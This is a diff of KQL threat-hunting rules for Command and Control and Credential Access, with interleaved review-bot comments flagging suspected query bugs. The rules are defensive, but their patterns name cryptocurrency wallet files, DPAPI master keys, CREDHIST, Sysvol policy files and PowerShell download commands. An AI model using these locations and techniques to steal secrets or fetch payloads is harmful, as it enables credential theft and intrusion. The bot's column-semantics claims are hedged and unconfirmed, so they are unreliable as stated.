-// Level: high
-// Description: Detects a tscon.exe start as LOCAL SYSTEM
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-
-DeviceProcessEvents
+// Title: Suspicious TSCON Start as SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-17
+// Level: high
+// Description: Detects a tscon.exe start as LOCAL SYSTEM
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceProcessEvents
 | where FolderPath endswith "\\tscon.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql b/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql
index 235b6f08..93c86590 100644
--- a/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql
+++ b/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Velociraptor Child Process
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-08-29
-// Level: high
-// Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.persistence, attack.defense-evasion, attack.t1219
-// False Positives:
-// - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts.
-
-DeviceProcessEvents
+// Title: Suspicious Velociraptor Child Process
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-08-29
+// Level: high
+// Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.defense-evasion, attack.t1219
+// False Positives:
+// - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\Velociraptor.exe" and ((ProcessCommandLine contains "msiexec" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "http") or ((ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR " or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "code.exe" and ProcessCommandLine contains "tunnel" and ProcessCommandLine contains "--accept-server-license-terms"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/teamviewer_remote_session.kql b/KQL/rules/Command and Control/teamviewer_remote_session.kql
index 74ae312f..5a39750e 100644
--- a/KQL/rules/Command and Control/teamviewer_remote_session.kql
+++ b/KQL/rules/Command and Control/teamviewer_remote_session.kql
@@ -1,12 +1,12 @@
-// Title: TeamViewer Remote Session
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-30
-// Level: medium
-// Description: Detects the creation of log files during a TeamViewer remote session
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate uses of TeamViewer in an organisation
-
-DeviceFileEvents
+// Title: TeamViewer Remote Session
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-30
+// Level: medium
+// Description: Detects the creation of log files during a TeamViewer remote session
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate uses of TeamViewer in an organisation
+
+DeviceFileEvents
 | where (FolderPath endswith "\\TeamViewer\\RemotePrinting\\tvprint.db" or FolderPath endswith "\\TeamViewer\\TVNetwork.log") or (FolderPath contains "\\TeamViewer" and FolderPath contains "_Logfile.log")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/tor_client_browser_execution.kql b/KQL/rules/Command and Control/tor_client_browser_execution.kql
index bfc1c1fd..48359a1e 100644
--- a/KQL/rules/Command and Control/tor_client_browser_execution.kql
+++ b/KQL/rules/Command and Control/tor_client_browser_execution.kql
@@ -1,10 +1,10 @@
-// Title: Tor Client/Browser Execution
-// Author: frack113
-// Date: 2022-02-20
-// Level: high
-// Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090.003
-
-DeviceProcessEvents
+// Title: Tor Client/Browser Execution
+// Author: frack113
+// Date: 2022-02-20
+// Level: high
+// Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.003
+
+DeviceProcessEvents
 | where FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql
index 493f650f..2b12190b 100644
--- a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql
+++ b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql
@@ -1,11 +1,11 @@
-// Title: Uncommon Network Connection Initiated By Certutil.EXE
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022-09-02
-// Level: high
-// Description: Detects a network connection initiated by the certutil.exe utility.
-// Attackers can abuse the utility in order to download malware or additional payloads.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceNetworkEvents
+// Title: Uncommon Network Connection Initiated By Certutil.EXE
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects a network connection initiated by the certutil.exe utility.
+// Attackers can abuse the utility in order to download malware or additional payloads.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceNetworkEvents
 | where (RemotePort in~ ("80", "135", "443", "445")) and InitiatingProcessFolderPath endswith "\\certutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql b/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql
index 073def73..34381a05 100644
--- a/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql
+++ b/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql
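Review bot: The port filter in the context line `RemotePort in~ ("80", "135", "443", "445")` compares what is, to my knowledge, an integer column in DeviceNetworkEvents against string literals with the case-insensitive string operator, which I would expect to be rejected at query compile time or, at best, never match; please verify in advanced hunting. If so the rule is dead as emitted and the fix is the numeric form, `| where RemotePort in (80, 135, 443, 445) and InitiatingProcessFolderPath endswith "\\certutil.exe"`. Since the converter produced this file, the same string-typed port list is likely present in every other network rule it emitted and is worth a one-off grep.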
@@ -1,12 +1,12 @@
-// Title: Use of UltraVNC Remote Access Software
-// Author: frack113
-// Date: 2022-10-02
-// Level: medium
-// Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Use of UltraVNC Remote Access Software
+// Author: frack113
+// Date: 2022-10-02
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where ProcessVersionInfoFileDescription =~ "VNCViewer" or ProcessVersionInfoProductName =~ "UltraVNC VNCViewer" or ProcessVersionInfoCompanyName =~ "UltraVNC" or ProcessVersionInfoOriginalFileName =~ "VNCViewer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql
index 0b3c798a..d38c1c38 100644
--- a/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql
@@ -1,12 +1,12 @@
-// Title: Visual Studio Code Tunnel Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), citron_ninja
-// Date: 2023-10-25
-// Level: medium
-// Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1071.001, attack.t1219
-// False Positives:
-// - Legitimate use of Visual Studio Code tunnel
-
-DeviceProcessEvents
+// Title: Visual Studio Code Tunnel Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), citron_ninja
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001, attack.t1219
+// False Positives:
+// - Legitimate use of Visual Studio Code tunnel
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or ((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
index a123605d..4f34b52a 100644
--- a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
@@ -1,10 +1,10 @@
-// Title: Visual Studio Code Tunnel Remote File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-25
-// Level: medium
-// Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control
-
-DeviceFileEvents
+// Title: Visual Studio Code Tunnel Remote File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe" and FolderPath contains "\\.vscode-server\\data\\User\\History\\"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql
index 58a39f23..ece67324 100644
--- a/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql
@@ -1,12 +1,12 @@
-// Title: Visual Studio Code Tunnel Service Installation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-25
-// Level: medium
-// Description: Detects the installation of VsCode tunnel (code-tunnel) as a service.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1071.001
-// False Positives:
-// - Legitimate installation of code-tunnel as a service
-
-DeviceProcessEvents
+// Title: Visual Studio Code Tunnel Service Installation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the installation of VsCode tunnel (code-tunnel) as a service.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+// - Legitimate installation of code-tunnel as a service
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql
index 9174c8fe..8b11bba6 100644
--- a/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql
@@ -1,12 +1,12 @@
-// Title: Visual Studio Code Tunnel Shell Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-25
-// Level: medium
-// Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1071.001
-// False Positives:
-// - Legitimate use of Visual Studio Code tunnel and running code from there
-
-DeviceProcessEvents
+// Title: Visual Studio Code Tunnel Shell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+// - Legitimate use of Visual Studio Code tunnel and running code from there
+
+DeviceProcessEvents
 | where (InitiatingProcessCommandLine contains ".vscode-server" and InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe") and ((ProcessCommandLine contains "\\terminal\\browser\\media\\shellIntegration.ps1" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bash.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql b/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql
index b494b440..269ff083 100644
--- a/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql
+++ b/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql
@@ -1,12 +1,12 @@
-// Title: Wget Creating Files in Tmp Directory
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: medium
-// Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Legitimate downloads of files in the tmp folder.
-
-DeviceFileEvents
+// Title: Wget Creating Files in Tmp Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate downloads of files in the tmp folder.
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "/wget" and (FolderPath startswith "/tmp/" or FolderPath startswith "/var/tmp/")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
index 0d746a56..6d4e9790 100644
--- a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
@@ -1,16 +1,16 @@
-// Title: Access To Crypto Currency Wallets By Uncommon Applications
-// Author: X__Junior (Nextron Systems)
-// Date: 2024-07-29
-// Level: medium
-// Description: Detects file access requests to crypto currency files by uncommon processes.
-// Could indicate potential attempt of crypto currency wallet stealing.
-// MITRE Tactic: Credential Access
-// Tags: attack.t1003, attack.credential-access
-// False Positives:
-// - Antivirus, Anti-Spyware, Anti-Malware Software
-// - Backup software
-// - Legitimate software installed on partitions other than "C:\"
-// - Searching software such as "everything.exe"
-
-DeviceFileEvents
+// Title: Access To Crypto Currency Wallets By Uncommon Applications
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-07-29
+// Level: medium
+// Description: Detects file access requests to crypto currency files by uncommon processes.
+// Could indicate potential attempt of crypto currency wallet stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
 | where ((FileName contains "\\AppData\\Roaming\\Ethereum\\keystore\\" or FileName contains "\\AppData\\Roaming\\EthereumClassic\\keystore\\" or FileName contains "\\AppData\\Roaming\\monero\\wallets\\") or (FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinABC\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinSV\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DashCore\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DogeCoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Litecoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Ripple\\wallet.dat" or FileName endswith 
"\\AppData\\Roaming\\Zcash\\wallet.dat")) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql index a1a05860..0a07ab8a 100644 --- a/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql 
@@ -1,10 +1,10 @@
-// Title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications
-// Author: frack113
-// Date: 2023-12-21
-// Level: medium
-// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.006
-
-DeviceFileEvents
+// Title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications
+// Author: frack113
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceFileEvents
 | where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql
index 8b6fa1cc..1ae442a2 100644
--- a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql
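Review bot: Every path test in this rule's context line is written against `FileName` (`FileName contains "\\sysvol\\"`, `FileName endswith "GptTmpl.inf"`, `FileName startswith "\\"`), but as far as I know `FileName` in DeviceFileEvents holds only the bare file name while the directory lives in `FolderPath`, so the `contains "\\sysvol\\"` and `startswith "\\"` conjuncts can never be true and the rule is silently dead. The same pattern appears in the crypto-wallet hunk just above (L4542–L4543, `FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat"`), the CREDHIST hunk (`FileName endswith "\\Microsoft\\Protect\\CREDHIST"`) and the DPAPI master-key hunk (`FileName contains "\\Microsoft\\Protect\\S-1-5-18\\"`), which suggests the converter maps Sigma's file_access `FileName` field one-to-one instead of to the path column. I would fix it in the converter's field mapping rather than per file, e.g. `FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath endswith "GptTmpl.inf"`, and add a regression test asserting that no emitted DeviceFileEvents rule applies a path-containing literal to `FileName`; please confirm the column semantics against a live tenant before relying on this.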
+++ b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql
@@ -1,11 +1,11 @@
-// Title: Access To Windows Credential History File By Uncommon Applications
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-17
-// Level: medium
-// Description: Detects file access requests to the Windows Credential History File by an uncommon application.
-// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555.004
-
-DeviceFileEvents
+// Title: Access To Windows Credential History File By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects file access requests to the Windows Credential History File by an uncommon application.
+// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceFileEvents
 | where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
index 542529f5..631e6f79 100644
--- a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
@@ -1,11 +1,11 @@
-// Title: Access To Windows DPAPI Master Keys By Uncommon Applications
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-17
-// Level: medium
-// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
-// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555.004
-
-DeviceFileEvents
+// Title: Access To Windows DPAPI Master Keys By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
+// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceFileEvents
 | where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql b/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql
index 2f90a1f7..3470364b 100644
--- a/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql
+++ b/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql
@@ -1,10 +1,10 @@
-// Title: Browser Started with Remote Debugging
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-27
-// Level: medium
-// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.collection, attack.t1185
-
-DeviceProcessEvents
+// Title: Browser Started with Remote Debugging
+// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-27
+// Level: medium
+// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1185
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql b/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql
index 5dc13da8..093675d4 100644
--- a/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql
+++ b/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql
@@ -1,12 +1,12 @@
-// Title: Capture Credentials with Rpcping.exe
-// Author: Julia Fomina, oscd.community
-// Date: 2020-10-09
-// Level: medium
-// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Capture Credentials with Rpcping.exe
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s" or ProcessCommandLine contains "–s" or ProcessCommandLine contains "—s" or ProcessCommandLine contains "―s") and (FolderPath endswith "\\RpcPing.exe" or ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe")) and ((ProcessCommandLine contains "ncacn_np" and (ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t" or ProcessCommandLine contains "–t" or ProcessCommandLine contains "—t" or ProcessCommandLine contains "―t")) or (ProcessCommandLine contains "NTLM" and (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/certificate_exported_via_powershell.kql b/KQL/rules/Credential Access/certificate_exported_via_powershell.kql
index 155368db..a90f4a67 100644
--- a/KQL/rules/Credential Access/certificate_exported_via_powershell.kql
+++ b/KQL/rules/Credential Access/certificate_exported_via_powershell.kql
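Review bot: The alternative image match `ProcessVersionInfoOriginalFileName =~ "\\RpcPing.exe"` in the context line carries a leading backslash, and the OriginalFilename version-info field is a bare file name with no path component, so this branch should never match and the rule effectively rests on `FolderPath endswith "\\RpcPing.exe"` alone. Whether the backslash originates in the upstream Sigma rule or in the conversion I cannot tell from the hunk; either way the emitted form should be `ProcessVersionInfoOriginalFileName =~ "RpcPing.exe"`. A converter-side check that rejects path separators in OriginalFileName literals would catch this class of error across the whole rule set.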
@@ -1,12 +1,12 @@
-// Title: Certificate Exported Via PowerShell
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-18
-// Level: medium
-// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.execution, attack.t1552.004, attack.t1059.001
-// False Positives:
-// - Legitimate certificate exports by administrators. Additional filters might be required.
-
-DeviceProcessEvents
+// Title: Certificate Exported Via PowerShell
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.execution, attack.t1552.004, attack.t1059.001
+// False Positives:
+// - Legitimate certificate exports by administrators. Additional filters might be required.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql b/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
index 8121a3b7..c6def7c1 100644
--- a/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
+++ b/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
@@ -1,10 +1,10 @@
-// Title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-27
-// Level: high
-// Description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access
-
-DeviceProcessEvents
